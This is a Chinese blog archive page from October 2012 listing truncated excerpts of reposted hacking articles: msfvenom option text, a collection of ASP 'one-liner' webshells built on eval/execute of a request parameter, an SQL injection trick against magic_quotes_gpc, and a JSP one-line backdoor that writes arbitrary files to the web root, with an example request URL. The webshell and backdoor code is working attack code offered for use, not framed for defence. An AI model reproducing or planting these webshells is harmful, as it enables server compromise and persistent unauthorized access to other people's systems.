• 博客园logo
  • 会员
  • 周边
  • 新闻
  • 博问
  • 闪存
  • 众包
  • 赞助商
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
DemonSpider‘s BLOG
愿我的的剑芒<-|->永远闪耀!
博客园 | 首页 | 新随笔 | 新文章 | 联系 | 订阅 订阅 | 管理

10 2012 档案

 
神器metasploit中Msfvenom 的用法(外文翻译转)
摘要:Options: -p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads -l, --list [module_type] List a module type example: payloads, encoders, nops, all -n, --nopsled [length] Prepend a nopsled of [length] size on to the payload -f, --format [format] Format to output 阅读全文
posted @ 2012-10-25 14:02 DemonSpider 阅读(1099) 评论(0) 推荐(0)
各种一句话大集合(转)
摘要:asp一句话木马程序后门代码<%eval request("admin163")%>程序代码 <%execute request("admin163")%>程序代码 <%execute(request("admin163"))%>程序代码 <%execute request("admin163")%><%'<% loop <%:%>程序后门代码 <%'<% loop <%:%><%execute r 阅读全文
posted @ 2012-10-24 22:57 DemonSpider 阅读(1348) 评论(0) 推荐(0)
开启magic_quote_gpc后的sql注入技巧(转)
摘要:通过启用php.ini配置文件中的相关选项,就可以将大部分想利用SQL注入漏洞的骇客拒绝于门外。 开启magic_quote_gpc=on之后,能实现addslshes()和stripslashes()这两个函数的功能。在PHP4.0及以上的版本中,该选项默认情况下是开启的,所以在PHP4.0及以上的版本中,就算PHP程序中的参数没有进行过滤,PHP系统也会对每一个通过GET、POST、COOKIE方式传递的变量自动转换,换句话说,输入的注入攻击代码将会全部被转换,将给攻击者带来非常大的困难。 虽然如此,攻击者仍然有机会进行SQL注入攻击。。。。。。前提是,当参数为数字型的时候,且未经过Int 阅读全文
posted @ 2012-10-22 08:32 DemonSpider 阅读(338) 评论(0) 推荐(0)
.jsp获取路径(转)
摘要:<%@ page contentType="text/html; charset=gb2312" language="java" import="java.io.*" errorPage="" %><html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>Untitled Document</ti 阅读全文
posted @ 2012-10-12 08:41 DemonSpider 阅读(271) 评论(0) 推荐(0)
JSP一句话后门(转)
摘要:<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url! http://localhost/1.jsp?f=1.txt&t=hello 然后:ht 阅读全文
posted @ 2012-10-05 12:04 DemonSpider 阅读(387) 评论(0) 推荐(0)
 

公告


博客园  ©  2004-2026
浙公网安备 33010602011771号 浙ICP备2021040463号-3